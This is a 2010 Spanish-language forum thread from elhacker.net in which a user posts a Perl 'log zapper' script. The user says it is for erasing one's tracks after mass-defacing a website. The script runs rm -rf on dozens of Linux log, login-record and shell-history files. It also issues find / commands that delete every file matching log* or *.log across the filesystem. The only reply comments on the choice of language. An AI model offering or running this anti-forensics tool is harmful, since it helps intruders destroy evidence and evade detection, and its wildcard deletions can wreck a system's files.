elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] Zapper for Linux
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] Zapper for Linux  (Leído 2,306 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] Zapper for Linux
« en: 29 Julio 2010, 23:20 pm »

Bueno ,esta herramienta no tiene un nombre chevere pero bueno , con esta herramienta pueden
borrar sus huellas despues de hacer un masivo deface en una pobre web.
Recuerden que primero deben darle permisos y despues ejecutarlo.

Código:
#Zapper
#By Doddy Hackman

@paths = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var
/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth");

@comandos  = ('find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;');

print "[+] Zapping the logs\n";
for (@paths) {
if (-f $_) { system("rm -rf $_"); }
}
for (@comandos) {system($_);}
print "[+] All the logs are erased\n";

#The end


En línea

leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: [Perl] Zapper for Linux
« Respuesta #1 en: 29 Julio 2010, 23:56 pm »

Tiene más pinta de Bash que de Perl, mejor déjalo en Bash.


En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
Re: [Perl] Zapper for Linux
« Respuesta #2 en: 30 Julio 2010, 00:05 am »

Ok  , gracias por tu opinion
« Última modificación: 30 Julio 2010, 00:35 am por Doddy » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines